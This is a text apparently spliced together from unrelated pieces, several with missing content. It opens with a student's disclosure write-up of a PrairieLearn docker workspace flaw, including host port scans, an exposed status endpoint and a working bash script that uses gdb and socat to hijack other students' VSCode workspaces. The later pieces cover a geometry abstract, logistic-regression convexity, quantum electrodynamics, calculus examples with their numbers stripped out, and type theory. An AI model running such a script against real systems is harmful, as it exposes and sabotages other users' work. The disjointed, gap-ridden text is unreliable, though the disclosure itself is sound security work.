Some of you might already be able to guess how this is done (it’s in the writeup title after all) - that’s right, it’s automatically provisioned docker instances. PrairieLearn helpfully provided all the source you need to understand how it’s done, but we will get back to that in a bit. Now, you might be wondering “aren’t docker containers pretty secure?”, and to that I’ll answer yes, but while machines don’t (usually) make mistakes, us humans do all the time.
With this in mind, I set out to try some of the most common misconfigurations that could've resulted in docker escapes. While I realized I was able to do random things like circumvent their file isolation using base64 copy and pasting, along with trivially escalating to root (which I later realized is by design), everything seemed to be robust enough to withstand known container escape techniques. That is, until I tried snooping around on the host:
# ./nc -zv -w 1 172.19.0.1 1-65535
172.19.0.1: inverse host lookup failed: Host name lookup failure
(UNKNOWN) [172.19.0.1] 43505 (?) open
(UNKNOWN) [172.19.0.1] 35083 (?) open
(UNKNOWN) [172.19.0.1] 28400 (?) open
(UNKNOWN) [172.19.0.1] 25067 (?) open
(UNKNOWN) [172.19.0.1] 22315 (?) open
(UNKNOWN) [172.19.0.1] 9402 (?) open
(UNKNOWN) [172.19.0.1] 8081 (tproxy) open
(UNKNOWN) [172.19.0.1] 7335 (?) open
(UNKNOWN) [172.19.0.1] 111 (sunrpc) open
(UNKNOWN) [172.19.0.1] 22 (ssh) open
Wait - huh? I wasn’t expecting to be able to see any open ports at all, since it’s the docker host IP. After testing connections to the ports, I’ve realized that I was actually able to communicate with the host:
• 22 is actually an SSH port
• 111 seems to be an RPC port of sorts (maybe for NFS?)
• 8081 gives me an Express.js not found error no matter what common page requests I give
• The rest of the ports gave me an html page with references to VSCode on a curl GET request, which ended up being the VSCode server's frontend page
Incidentally, all of the workspace instances are hosting VSCode servers for us to code on - doesn’t this mean I can connect to other workspaces?
## Why code a client when you can reuse one
Ok, we can connect to other workspaces, but that doesn't help much - the VSCode server used has so many bells and whistles that curl just won't cut it (or at least I'd go insane before I could issue that many commands to do anything useful). Also, since the container is cut off from the outside internet, the only access we have is through the PrairieLearn proxied frontend we were given - but that only listens to our own container and nothing else.
Is this where we give up and go home then? Nope, it just means that we need to trick our container into redirecting the frontend connection to the other workspaces! This proves to be harder than I initially thought - in fact coding the weaponized script took more than 5 times the time I used to find the misconfiguration in the first place. This was mainly because of the following requirements:
• We need a way to reliably obtain open VSCode ports
• We need a way to replace the node server that is running our VSCode instance with a proxy to listen on the same port, while not killing it
• The frontend only listens to the forwarded VSCode port (8080), so we cannot use another port and expect the frontend to be able to connect to it
• Killing the node server would crash the workspace, since dumb-init dies if the child process dies
• We cannot listen to the same port with 2 processes, which means we need a way to detach from a port without killing the process
• We need to gracefully reset the frontend connection and reconnect to the new proxy after the proxy has been set up
The following command gives a pretty good visualization how our processes are set up in the container:
$ pstree -a
sh /usr/bin/entrypoint.sh --bind-addr 0.0.0.0:8080 . --auth none
└─dumb-init /usr/bin/entrypoint-helper.sh --bind-addr 0.0.0.0:8080 . --auth none
  └─sh /usr/bin/entrypoint-helper.sh --bind-addr 0.0.0.0:8080 . --auth none
    └─node /usr/lib/code-server --auth none --bind-addr 0.0.0.0:8080 . --auth none
      ├─node /usr/lib/code-server --auth none --bind-addr 0.0.0.0:8080 . --auth none
      │ ├─node /usr/lib/code-server/lib/vscode/out/vs/server/fork
      │ │ ├─node /usr/lib/code-server/lib/vscode/out/bootstrap-fork --type=watcherService
      │ │ │ └─10*[{node}]
      │ │ ├─node /usr/lib/code-server/lib/vscode/out/bootstrap-fork --type=extensionHost
      │ │ │ ├─bash
      │ │ │ │ └─pstree -a
      │ │ │ └─16*[{node}]
      │ │ └─11*[{node}]
      │ └─10*[{node}]
      └─10*[{node}]
With that in mind, after a bit of brain racking and trial and error, I eventually figured out a series of tricks to solve all of them:
• We can port scan the host to obtain open ports with netcat (and more reliably via the status page, as found out in the next section)
• We can utilize gdb to invoke close(fd) on the socket descriptors obtained through lsof, to gracefully close the connection without terminating the server
• Start socat for the proxying, replacing the node instance
• Suspend only the node process that our connection is established to, and force a timeout so the frontend reconnects
• Automate all of these to not need manual input, since manual input is unstable during this transition
And here are all the tricks formalized into a script:
#obtain the PIDs that represent our own VSCode instances that are listening to our PrairieLearn frontend
PIDS=$(./netstat -tuplen | grep '8080.*' | grep -oh '[0-9]*/node' | grep -oh '[0-9]*' | sort | uniq)

#find other VSCode instances by either port scanning our host or getting the ports from the status page (selected at random)
#PORT=$(./nc -zvn -w 1 172.19.0.1 8082-65535 2>&1 | grep -oh ' [0-9]* ' | sed -r "s/ ([0-9]*) /\1/g" | head -n 1)
PORT=$(curl http://172.19.0.1:8081/status 2>&1 | grep -oh 'PublicPort":[0-9]*' | grep -oh '[0-9]*' | shuf | head -n 1)
echo port: $PORT

#detach our VSCode instances from the port by calling close() on the respective descriptors from lsof
IFS=$'\n'
for PID in $PIDS
do
    eval gdb -batch $(./lsof -np $PID | grep -P '(LISTEN)' | grep -oh '[0-9]*u' | grep -oh '[0-9]*' | sed -zr 's/([0-9]*)+\n/-ex "call close(\1)" /g') -ex 'quit' -p $PID
done

#start proxying, listening on the same port redirecting to the port of the other instance we found
./socat tcp-l:8080,fork,reuseaddr tcp:172.19.0.1:$PORT &
./socat tcp:$(cat /etc/hosts | grep '172' | grep -oh '^.*\s' | sed "s/\s//g"):8080,fork,reuseaddr tcp:172.19.0.1:$PORT &

PIDS=$(./netstat -tuplena | grep '8080.*' | grep -oh '[0-9]*/node' | grep -oh '[0-9]*' | sort | uniq)
#debug
for PID in $PIDS
do
    echo $PID
done

#pause our own VSCode instance to reset the connection from the frontend
PID=$(echo $PIDS | grep -oh '[0-9]*$') #get last pid, likely with the connection we need to terminate
echo pid: $PID
kill -STOP $PID
All that’s left is to try running this script now:
Then all we need to do is wait, click reload window, and voila! We have switched into a random workspace through its VSCode instance. Or as they say, ahem, in hacker voice: “I’m in.”
(sorry random classmate for using your codes as an example 😅)
All the fun stuff you expect to work works just like usual - the commands work, you can open and edit any of the files, or even delete everything and leave a note saying haha pwned 🥴 (please don’t)
In all seriousness though, this means that an adversary can modify gradable files and sabotage other people's work - from copying other classmates' codes covertly to finish your own assignment, to erasing all their progress, or even faking academic misconduct events by copying one student's codes to another student's workspace - all kinds of chaos ensue from this. Definitely not a good thing for academic integrity.
## What about the other ports?
Now that we were able to weaponize connecting to other containers with our own frontend, it’s time to investigate the other ports. The SSH server seems very secure after investigating, so I gave up on that almost instantly; I couldn’t get the RPC port to give me any useful information either. But we still have port 8081 that just always errors:
# curl -vvv http://172.19.0.1:8081
* Expire in 0 ms for 6 (transfer 0x55f6677e4f50)
* Trying 172.19.0.1...
* TCP_NODELAY set
* Expire in 200 ms for 4 (transfer 0x55f6677e4f50)
* Connected to 172.19.0.1 (172.19.0.1) port 8081 (#0)
> GET / HTTP/1.1
> Host: 172.19.0.1:8081
> User-Agent: curl/7.64.0
> Accept: */*
>
< X-Powered-By: Express
< Content-Security-Policy: default-src 'none'
< X-Content-Type-Options: nosniff
< Content-Type: text/html; charset=utf-8
< Content-Length: 139
< Date: Sun, 11 Sep 2022 22:06:52 GMT
< Connection: keep-alive
< Keep-Alive: timeout=5
<
<!DOCTYPE html>
<html lang="en">
<meta charset="utf-8">
<title>Error</title>
<body>
<pre>Cannot GET /</pre>
</body>
</html>
* Connection #0 to host 172.19.0.1 left intact
Then it dawned upon me - didn’t I say PrairieLearn is open source? Upon searching what port 8081 might be on the PrairieLearn github, I realized it was actually the workspace interface server - remember the source I linked in the introduction? Turns out that is exactly the server I was pinging, and the source code detailed how to interact with their API - which means it’s time to try a curl http://172.19.0.1:8081/status:
{"docker":[{"Id":"c2eb729a4c4ee33f00be9e0fa540a6d2fb14523093e8265bf9af07b727814444","Names":["/workspace-8f2399ac-0604-4fe0-9dce-18b2bbd39c1d"],"Image":"[REDACTED]/workspace:1.1.2","ImageID":"sha256:[REDACTED]","Command":"/usr/bin/env sh /usr/bin/entrypoint.sh --bind-addr 0.0.0.0:8080 . --auth none","Created":1662956312,"Ports":[{"IP":"0.0.0.0","PrivatePort":8080,"PublicPort":5658,"Type":"tcp"},{"IP":"::","PrivatePort":8080,"PublicPort":5658,"Type":"tcp"}],"Labels":{},"State":"running","Status":"Up 35 seconds","HostConfig":{"NetworkMode":"no-internet"},"NetworkSettings":{"Networks":{"no-internet":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"[REDACTED]","EndpointID":"[REDACTED]","Gateway":"172.19.0.1","IPAddress":"172.19.0.3","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"[REDACTED]","DriverOpts":null}}},"Mounts":[{"Type":"bind","Source":"[REDACTED]","Destination":"/home/coder","Mode":"","RW":true,"Propagation":"rprivate"}]}, (...) ],"postgres":"ok"}
Oh boy, that’s a lot of sensitive information - I didn’t even have to authenticate in any way. While that saves us a lot of guessing pain, it doesn’t give us more attack vectors; but that’s not the case when it comes to the other endpoints. They likely allow adversaries to create or reset workspace instances whenever they want, which makes DoSing trivial; not to mention the interface server as a whole being accessible also exposes the possibility of escalation to host if there exists any vulnerabilities in the server itself.
I eventually also figured out that you can just connect to the private ports of the other containers from our own container directly, and proxying will work the same. Looking at the codes and entrypoint commands run in the container, we can see why:
• For the interface server, server.listen() was only called with a port, which means it falls back to the default host of 0.0.0.0
• For the VSCode instances, --bind-addr is bound to 0.0.0.0:8080 as visible in pstree -a output above; the public port assigned is also bound to "IP":"0.0.0.0" as shown in the status page response above
Since 0.0.0.0 is accessible from anywhere if there is no infra-side access rules preventing it (e.g. iptables filters), it makes sense both container-to-container communication and access through host was possible.
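For illustration, the binding difference can be reproduced with a few lines of Python (a generic sketch of the behaviour, not PrairieLearn's actual code; the port is arbitrary):

```python
import socket

# Bound to 0.0.0.0, the service accepts connections from any interface,
# including the docker bridge (172.19.0.0/16) that other containers share.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", 8081))
# A loopback-only bind would have kept it host-local instead:
# s.bind(("127.0.0.1", 8081))
s.listen()
```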
It also seems like this issue should be present in all of the courses that use workspaces - the listening addresses and the way workspace instances are made are all automated using the same codes, after all. Time to report all these to the profs…
# Part 2: Reporting
## How to feel like a bug hunter
I initially contacted the teaching team of the course but they don’t seem to be able to do much - though they did mention they will think of something to do about this. Fast forward a week or so, and we were talking about some other PrairieLearn issues in the course I’m TAing this term - which suddenly reminded me of this issue.
Seeing that I still haven’t received much news yet, I figured I might as well just bring it up in the meeting too since we will also be using workspaces in some future assignments - this time, however, the instructor in charge got much more alarmed. As the meeting was about to end, he requested me to write a formal report and email it to him so he can determine how serious it is, which I did that evening. While doing that, I also made a rough and ugly diagram to illustrate how the issue i found works:
The next morning, I received a request for information embargoing on this issue - it has now been considered a vulnerability, and is being escalated to the department heads to figure out what to do with this. I then received inquiries about how this might impact academic integrity, especially in the context of exams if left unfixed - which I drafted another thousand-word email in answer to.
While writing that, I also realized the vulnerability is more serious than I initially thought if workspaces were used in exams. Since the workspace host is shared across the entire course regardless of assignment type, a student could ask (or pay) another student in the course who is not taking the exam at the same time to work on their exam. They would just have to figure out how to identify the workspace instance beforehand, have the student who is not taking the exam fire up an assignment with workspaces while the other student is taking the exam, proxy into workspaces until they reach the right one, and work on it from outside the invigilation room. This would be completely covert: unless invigilators were focusing on the student the entire time, it would look like they were coding it themselves. Poof! We have academic integrity blown to smithereens. And that's exactly what we don't want.
Eventually, it was escalated to the PrairieLearn maintainers themselves, and I was invited to work with them on resolving this vulnerability. After a slight mishap while patching which basically took the entire workspace docker network down, we were able to get an infra-side patch deployed correctly, and I was able to verify that the vulnerable endpoints no longer responded to me. With this, the saga has finally come to an end - and everyone lived happily after.
That is I guess everyone aside from these classmates - oopsies! I’m sorry 😢
# Thoughts
Although this wasn’t an official bug bounty and the vulnerability isn’t exactly novel, it was still really fun getting a glimpse of what the bug hunting world and the processes involved look like. I’m also really glad I got to work with so many cool people on this journey - from our own profs to the PrairieLearn maintainers, it’s been a blast talking to and working with them on resolving this.
I’ve also really liked the concept of workspaces in PrairieLearn, since it is convenient both for the students and for the teaching team, so it feels pretty nice to have contributed, in some small way, to more courses being able to utilize this feature in the future.
Again, thanks to the UBC CS department and the PrairieLearn maintainers for taking my ramblings seriously and handling this so quickly!
|
# Metrics of constant curvature on a Riemann surface with two corners on the boundary
Research paper by Juergen Jost, Guofang Wang, Chunqin Zhou
Indexed on: 19 Dec '07. Published on: 19 Dec '07. Published in: Mathematics - Differential Geometry.
#### Abstract
We use PDE methods as developed for the Liouville equation to study the existence of conformal metrics with prescribed singularities on surfaces with boundary, the boundary condition being constant geodesic curvature. Our first result shows that a disk with two corners admits a conformal metric with constant Gauss curvature and constant geodesic curvature on its boundary if and only if the two corners have the same angle. In fact, we can classify all the solutions in a more general situation, that of the 2-sphere cut by two planes.
|
# is cost function of logistic regression convex or not? [duplicate]
This question already has an answer here:
For logistic regression, is the loss function convex or not? Andrew Ng of Coursera said it is convex, but in NPTEL it is said to be non-convex because there is no unique solution (many possible classifying lines).
## marked as duplicate by Sycorax, Michael Chernick, user158565, Jeremy Miles, Frans Rodenburg, Jun 14 at 6:05
This question has been asked before and already has an answer. If those answers do not fully address your question, please ask a new question.
## 1 Answer
I don't think anybody claimed that it isn't convex, since it is convex (maybe they meant the logistic function or neural networks). Let's check the 1D version for simplicity:
$$L = - t \log(p) - (1 - t) \log(1-p)$$
Where $$p = \frac{1}{1 + \exp(-wx)}$$
$$t$$ is target, $$x$$ is input, and $$w$$ denotes weights.
L is twice differentiable with respect to $$w$$ and $$\frac{d^2}{dw^2} L = \frac{x^2 \exp(wx)}{(1 + \exp(wx))^2} \ge 0$$, so the loss function is convex.
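As a quick sanity check (my addition, not part of the original answer), the nonnegative curvature can be verified numerically with finite differences; the sample values of `x` and `t` below are arbitrary:

```python
import numpy as np

def loss(w, x=1.5, t=0.7):
    # 1D logistic loss: L(w) = -t*log(p) - (1-t)*log(1-p), with p = sigmoid(w*x)
    p = 1.0 / (1.0 + np.exp(-w * x))
    return -t * np.log(p) - (1.0 - t) * np.log(1.0 - p)

ws = np.linspace(-5, 5, 201)
h = ws[1] - ws[0]
L = loss(ws)
curvature = (L[2:] - 2 * L[1:-1] + L[:-2]) / h**2  # discrete second derivative
print(curvature.min())  # stays >= 0, consistent with convexity
```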
|
# Quantum electrodynamics
Quantum electrodynamics
Quantum electrodynamics (QED) is a relativistic quantum field theory of electrodynamics. QED was developed by a number of physicists, beginning in the late 1920s. It basically describes how light and matter interact. More specifically it deals with the interactions between electrons, positrons and photons. QED mathematically describes all phenomena involving electrically charged particles interacting by means of exchange of photons. It has been called "the jewel of physics" for its extremely accurate predictions of quantities like the anomalous magnetic moment of the electron, and the Lamb shift of the energy levels of hydrogen. [Richard Feynman (1985), QED: The Strange Theory of Light and Matter (chapter 1, page 6, first paragraph), Princeton Univ. Press. http://www.amazon.com/gp/reader/0691024170]
In technical terms, QED can be described as a perturbation theory of the electromagnetic quantum vacuum.
History
The word 'quantum' is Latin, meaning "how much" (neut. sing. of quantus "how great"). [Online Etymology Dictionary] The word 'electrodynamics' was coined by André-Marie Ampère in 1822. [Grandy, W.T. (2001). "Relativistic Quantum Mechanics of Leptons and Fields", Springer.] The word 'quantum', as used in physics, i.e. with reference to the notion of count, was first used by Max Planck in 1900, and reinforced by Einstein in 1905 with his use of the term "light quanta".
Quantum theory began in 1900, when Max Planck assumed that energy is quantized in order to derive a formula predicting the observed frequency dependence of the energy emitted by a black body. This dependence is completely at variance with classical physics. In 1905, Einstein explained the photoelectric effect by postulating that light energy comes in quanta later called photons. In 1913, Bohr invoked quantization in his proposed explanation of the spectral lines of the hydrogen atom. In 1924, Louis de Broglie proposed a quantum theory of the wave-like nature of subatomic particles. The phrase "quantum physics" was first employed in Johnston's "Planck's Universe in Light of Modern Physics". These theories, while they fit the experimental facts to some extent, were strictly phenomenological: they provided no rigorous justification for the quantization they employed.
Modern quantum mechanics was born in 1925 with Werner Heisenberg's matrix mechanics and Erwin Schrödinger's wave mechanics and the Schrödinger equation, which was a non-relativistic generalization of de Broglie's (1925) relativistic approach. Schrödinger subsequently showed that these two approaches were equivalent. In 1927, Heisenberg formulated his uncertainty principle, and the Copenhagen interpretation of quantum mechanics began to take shape. Around this time, Paul Dirac, in work culminating in his 1930 monograph, finally joined quantum mechanics and special relativity, pioneered the use of operator theory, and devised the bra-ket notation widely used since. In 1932, John von Neumann formulated the rigorous mathematical basis for quantum mechanics as the theory of linear operators on Hilbert spaces. This and other work from the founding period remains valid and widely used.
Quantum chemistry began with Walter Heitler and Fritz London's 1927 quantum account of the covalent bond of the hydrogen molecule. Linus Pauling and others contributed to the subsequent development of quantum chemistry.
The application of quantum mechanics to fields rather than single particles, resulting in what are known as quantum field theories, began in 1927. Early contributors included Dirac, Wolfgang Pauli, Weisskopf, and Jordan. This line of research culminated in the 1940s in the quantum electrodynamics (QED) of Richard Feynman, Freeman Dyson, Julian Schwinger, and Sin-Itiro Tomonaga, for which Feynman, Schwinger and Tomonaga received the 1965 Nobel Prize in Physics. QED, a quantum theory of electrons, positrons, and the electromagnetic field, was the first satisfactory quantum description of a physical field and of the creation and annihilation of quantum particles.
QED involves a covariant and gauge invariant prescription for the calculation of observable quantities. Feynman's mathematical technique, based on his diagrams, initially seemed very different from the field-theoretic, operator-based approach of Schwinger and Tomonaga, but Freeman Dyson later showed that the two approaches were equivalent. The renormalization procedure for eliminating the awkward infinite predictions of quantum field theory was first implemented in QED. Even though renormalization works very well in practice, Feynman was never entirely comfortable with its mathematical validity, even referring to renormalization as a "shell game" and "hocus pocus". (Feynman, 1985: 128)
QED has served as the model and template for all subsequent quantum field theories. One such subsequent theory is quantum chromodynamics, which began in the early 1960s and attained its present form in the 1975 work by H. David Politzer, Sidney Coleman, David Gross and Frank Wilczek. Building on the pioneering work of Schwinger, Peter Higgs, Goldstone, and others, Sheldon Glashow, Steven Weinberg and Abdus Salam independently showed how the weak nuclear force and quantum electrodynamics could be merged into a single electroweak force.
Physical interpretation of QED
In classical optics, light travels over all allowed paths and their interference results in Fermat's principle. Similarly, in QED, light (or any other particle like an electron or a proton) passes over every possible path allowed by apertures or lenses. The observer (at a particular location) simply detects the mathematical result of all wave functions added up, as a sum of all line integrals. For other interpretations, paths are viewed as non-physical, mathematical constructs that are equivalent to other, possibly infinite, sets of mathematical expansions. According to QED, light can go slower or faster than c, but will travel at velocity c on average. [Richard P. Feynman, QED: The Strange Theory of Light and Matter, pp. 89-90: "the light has an amplitude to go faster or slower than the speed c, but these amplitudes cancel each other out over long distances"; see also accompanying text.]
Physically, QED describes charged particles (and their antiparticles) interacting with each other by the exchange of photons. The magnitude of these interactions can be computed using perturbation theory; these rather complex formulas have a remarkable pictorial representation as Feynman diagrams. QED was the theory to which Feynman diagrams were first applied. These diagrams were invented on the basis of Lagrangian mechanics. Using a Feynman diagram, one decides every possible path between the start and end points. Each path is assigned a complex-valued probability amplitude, and the actual amplitude we observe is the sum of all amplitudes over all possible paths. The paths with stationary phase contribute most (due to lack of destructive interference with some neighboring counter-phase paths) — this results in the stationary classical path between the two points.
QED doesn't predict what will happen in an experiment, but it can predict the "probability" of what will happen in an experiment, which is how it is experimentally verified. Predictions of QED agree with experiments to an extremely high degree of accuracy: currently about one part in $10^{12}$ (and limited by experimental errors); for details see precision tests of QED. This makes QED one of the most accurate physical theories constructed thus far.
Near the end of his life, Richard P. Feynman gave a series of lectures on QED intended for the lay public. These lectures were transcribed and published as Feynman (1985), QED: The Strange Theory of Light and Matter, a classic non-mathematical exposition of QED from the point of view articulated above.
Mathematics
Mathematically, QED is an abelian gauge theory with the symmetry group U(1). The gauge field, which mediates the interaction between the charged spin-1/2 fields, is the electromagnetic field. The QED Lagrangian for a spin-1/2 field interacting with the electromagnetic field is given by the real part of

$$\mathcal{L} = \bar{\psi}\,(i\gamma^\mu D_\mu - m)\,\psi - \frac{1}{4}F_{\mu\nu}F^{\mu\nu},$$

where

- $\gamma^\mu$ are Dirac matrices;
- $\psi$ is a bispinor field of spin-1/2 particles (e.g. the electron-positron field);
- $\bar{\psi} = \psi^\dagger\gamma^0$, called "psi-bar", is sometimes referred to as the Dirac adjoint;
- $D_\mu = \partial_\mu + ieA_\mu$ is the gauge covariant derivative;
- $e$ is the coupling constant, equal to the electric charge of the bispinor field;
- $A_\mu$ is the covariant four-potential of the electromagnetic field;
- $F_{\mu\nu} = \partial_\mu A_\nu - \partial_\nu A_\mu$ is the electromagnetic field tensor.

Euler-Lagrange equations

To begin, substituting the definition of $D_\mu$ into the Lagrangian gives us

$$\mathcal{L} = i\bar{\psi}\gamma^\mu\partial_\mu\psi - e\bar{\psi}\gamma^\mu A_\mu\psi - m\bar{\psi}\psi - \frac{1}{4}F_{\mu\nu}F^{\mu\nu}.$$

Next, we can substitute this Lagrangian into the Euler-Lagrange equation of motion for a field,

$$\partial_\mu \left( \frac{\partial\mathcal{L}}{\partial(\partial_\mu\psi)} \right) - \frac{\partial\mathcal{L}}{\partial\psi} = 0, \quad\quad (2)$$

to find the field equations for QED. The two terms from this Lagrangian are then

$$\partial_\mu \left( \frac{\partial\mathcal{L}}{\partial(\partial_\mu\psi)} \right) = \partial_\mu\left(i\bar{\psi}\gamma^\mu\right), \qquad \frac{\partial\mathcal{L}}{\partial\psi} = -e\bar{\psi}\gamma^\mu A_\mu - m\bar{\psi}.$$

Substituting these two back into the Euler-Lagrange equation (2) results in

$$i\,\partial_\mu\bar{\psi}\gamma^\mu + e\bar{\psi}\gamma^\mu A_\mu + m\bar{\psi} = 0,$$

with complex conjugate

$$i\gamma^\mu\partial_\mu\psi - e\gamma^\mu A_\mu\psi - m\psi = 0.$$

Bringing the middle term to the right-hand side transforms this second equation into the Dirac equation in an external electromagnetic field:

$$i\gamma^\mu\partial_\mu\psi - m\psi = e\gamma^\mu A_\mu\psi.$$
References
Journals
* J.M. Dudley and A.M. Kwan, "Richard Feynman's popular lectures on quantum electrodynamics: The 1979 Robb Lectures at Auckland University," American Journal of Physics Vol. 64 (June 1996) 694-698.
* [http://nobelprize.org/physics/laureates/1965/feynman-lecture.html Feynman's Nobel Prize lecture describing the evolution of QED and his role in it]
* [http://www.vega.org.uk/video/subseries/8 Feynman's New Zealand lectures on QED for non-physicists]
* [http://daarb.narod.ru/qed-eng.html On quantization of electromagnetic field]
|
# Calculus 1 : How to find rate of change
## Example Questions
### Example Question #2921 : Calculus
Find the rate of change of a function from to .
Explanation:
We can solve by utilizing the formula for the average rate of change:
.
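The formula itself is rendered as an image on the original page; presumably it is the standard average rate of change over an interval $[a, b]$:

$$\frac{\Delta f}{\Delta x} = \frac{f(b) - f(a)}{b - a}$$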
Solving for at our given points:
Plugging our values into the average rate of change formula, we get:
### Example Question #12 : How To Find Rate Of Change
At what time does the function have a slope of ? Round to the nearest hundredth.
Explanation:
First, we want the slope, so we have to take a derivative of . We will need to use the power rule which is,
on the first term. We need to also recall that the derivative of is.
Applying these rules we get the following derivative.
We're looking for the time the slope is , so we have to set the derivative (which gives you slope) equal to
.
At this point you can use a graphing calculator to graph the function , and trace the graph to find the x value that results in a y value of . The positive solution rounded to the nearest hundredth is .
### Example Question #13 : How To Find Rate Of Change
A rectangle has a length of four feet and a width of six feet. If the width of the rectangle increases at a rate of , how fast is the area of the rectangle increasing?
The area of the rectangle does not change.
Explanation:
In this problem we are given the length and width of a rectangle as well as the rate at which the width is increasing. We are asked to find the rate of change of the area of a rectangle. The equation for finding the area of a rectangle is given as
.
By taking the derivative of this equation with respect to time, we can find how the area changes with respect to time. To take the derivative of an equation with two variables, we must use the product rule,
.
Applying the product rule to the equation we obtain
.
Because the width of the rectangle is increasing at a rate of
Since the length of the rectangle does not change with respect to time, .
and are given to us as 4 feet and 6 feet respectively.
Therefore the area of this rectangle changes at a rate of when the width of the rectangle is increasing by .
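With the page's images elided, the general computation presumably runs as follows (length $l = 4$ ft is constant, width $w$ grows at the stated but elided rate):

$$A = lw \quad\Rightarrow\quad \frac{dA}{dt} = \frac{dl}{dt}\,w + l\,\frac{dw}{dt} = l\,\frac{dw}{dt} = 4\,\frac{dw}{dt}, \qquad \text{since } \frac{dl}{dt} = 0.$$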
### Example Question #11 : How To Find Rate Of Change
Find the rate of change of a function from to .
Explanation:
We can solve by utilizing the formula for the average rate of change: . Solving for at our given points:
Plugging our values into the average rate of change formula, we get:
.
### Example Question #15 : How To Find Rate Of Change
Find the rate of change of a function from to .
Explanation:
We can solve by utilizing the formula for the average rate of change: . Solving for at our given points:
Plugging our values into the average rate of change formula, we get:
.
### Example Question #16 : How To Find Rate Of Change
Find the rate of change of a function from to .
Explanation:
We can solve by utilizing the formula for the average rate of change: . Solving for at our given points:
Plugging our values into the average rate of change formula, we get:
.
### Example Question #17 : How To Find Rate Of Change
You are looking at a balloon that is away. If the height of the balloon is increasing at a rate of , at what rate is the angle of inclination of your position to the balloon increasing after seconds?
Explanation:
Using right triangles we know that
.
Solving for we get
.
Taking the derivative, we need to remember to apply the chain rule to since the height depends on time,
.
We are asked to find . We are given and since is constant, we know that the height of the balloon is given by .
Therefore, at we know that the height of the balloon is .
Plugging these numbers into we find
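The final numbers are elided on the page, but the relation being used is presumably the following, with $d$ the (given) horizontal distance and $h(t)$ the balloon's height:

$$\tan\theta = \frac{h}{d} \quad\Rightarrow\quad \sec^2\theta\,\frac{d\theta}{dt} = \frac{1}{d}\,\frac{dh}{dt} \quad\Rightarrow\quad \frac{d\theta}{dt} = \frac{\cos^2\theta}{d}\,\frac{dh}{dt}.$$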
### Example Question #18 : How To Find Rate Of Change
Boat leaves a port at noon traveling . At the same time, boat leaves the port traveling east at . At what rate is the distance between the two boats changing at ?
Explanation:
This scenario describes a right triangle where the hypotenuse is the distance between the two boats. Let denote the distance boat is from the port, denote the distance boat is from the port, denote the distance between the two boats, and denote the time since they left the port. Applying the Pythagorean Theorem we have,
.
Implicitly differentiating this equation we get
.
We need to find when .
We are given
which tells us
Plugging this in we have
.
Solving we get
.
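Since the numeric values are elided on the page, here is the symbolic relation presumably being used, with $x$, $y$ the boats' distances from the port and $z$ the distance between them:

$$z^2 = x^2 + y^2 \quad\Rightarrow\quad 2z\,\frac{dz}{dt} = 2x\,\frac{dx}{dt} + 2y\,\frac{dy}{dt} \quad\Rightarrow\quad \frac{dz}{dt} = \frac{x\,\frac{dx}{dt} + y\,\frac{dy}{dt}}{z}.$$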
### Example Question #2931 : Calculus
Find if the radius of a spherical balloon is increasing at a rate of per second.
Explanation:
The volume function, in terms of a radius , is given as
.
The change in volume over the change in time, or
is given as
and by implicit differentiation, the chain rule, and the power rule,
.
Setting we get
.
As such,
.
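The elided formulas are presumably the standard ones for a sphere of radius $r(t)$:

$$V = \frac{4}{3}\pi r^3 \quad\Rightarrow\quad \frac{dV}{dt} = 4\pi r^2\,\frac{dr}{dt}.$$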
### Example Question #20 : How To Find Rate Of Change
Find the rate of change of a function from to .
|
Relation between Russellian type theory and type systems
I recently realized that there is some sort of relation between Russellian type theory and type systems, as found e.g. in Haskell. Actually, some of the notation for types in Haskell seems to have precursors in type theory. But, IMHO, Russell's motivation in 1908 was to avoid Russell's paradox, and I am not sure how that is related to type systems in computer science.
Is Russell's paradox in one form or another something that we would have to worry about, for example, if we didn't have a good type system in a given language?
Type theory" in the sense of programming languages and in the sense of Russell are closely related. In fact, the modern field of dependent type theory aims to provide a constructive foundations for mathematics. Unlike set theory, most research in type theory based math is done in proof assistants like Coq, NuPRL, or Agda. As such, proofs done in these systems are not only "formalizable" but actually fully formal and machine checked. Using tactics and other proof automation techniques we try to make proving with these systems "high level" and thus resemble informal mathematics, but because everything is checked we have much better guarantees on correctness.
See here
Types in ordinary programming languages tend to be more limited, but the meta theory is the same.
Something similar to Russell's paradox is a major issue in dependent type theory. In particular, having
Type : Type
makes the logic inconsistent (via Girard's paradox, the type-theoretic analogue of Russell's paradox). The usual fix is to stratify types into a hierarchy of universes,
Type_0 : Type_1 : Type_2 : ...
but in Coq by default these universe levels are implicit, as they normally don't matter for the programmer.
In some systems (Agda, Idris), the type in type rule is enabled via a compile flag. It makes the logics inconsistent, but often makes exploratory programming/proving easier.
Even in more mainstream languages, Russell's paradox occasionally shows up. For example, in Haskell, an encoding of Russell's paradox combining impredicativity and open type case is possible, allowing one to build divergent terms without recursion, even at the type level. Haskell is "inconsistent" (when interpreted as a logic in the usual way) since it supports both type- and value-level recursion, not to mention exceptions. Nonetheless, this result is rather interesting.
• Thanks for your detailed answer - as far as proof goes, there are still no tools in sight to prove the correctness of programs in imperative languages like C++ or Java, right? I would love to put my hands on one of these... I realize this is a complete tangent. I know about Coq and Agda, but they didn't seem to be the right tools to prove correctness of programs written in C++ or Java. – Frank Aug 15 '13 at 3:45
• there are some tools. A few for C, many for Java, and tons for Ada. See for example: Why (Java, C, Ada), Krakatoa (Java), or SPARK (Ada subset with very good tooling). For C++ though, not so much. You also may be interested in YNot (Coq DSL). – Philip JF Aug 15 '13 at 4:02
You're right about Russell's motivation. His paradox plagues all theories of sets that admit unrestricted comprehension axioms to the effect that: any propositional function determines a set, namely that of all those entities that satisfy the function. Among theories of or based on sets that did have that flaw were Cantor's naive set theory and Frege's system of Grundgesetze (specifically: axiom 5).
Since types are considered to be special kinds of sets, if care is not taken, a similar paradox can creep into a type system. That being said, I'm not aware of any type systems that have suffered such a fate. I can only recall Church's early attempts at formulating the lambda calculus in the 30s, which turned out to be inconsistent (the Kleene-Rosser paradox), but that one was neither due to types nor related to Russell's paradox.
• Thanks for your answer. There are probably alternatives to types-a-la-Russell to avoid Russell paradox. Would any of these alternative solutions have anything interesting to contribute to computer languages? Mundane types are very useful to clearly specify contracts between parts of the code, and even before that, to give semantics to programs at all. Would there be other semantics that could be obtained with something else than types? (I have NO idea what that would be :-) – Frank Aug 15 '13 at 3:48
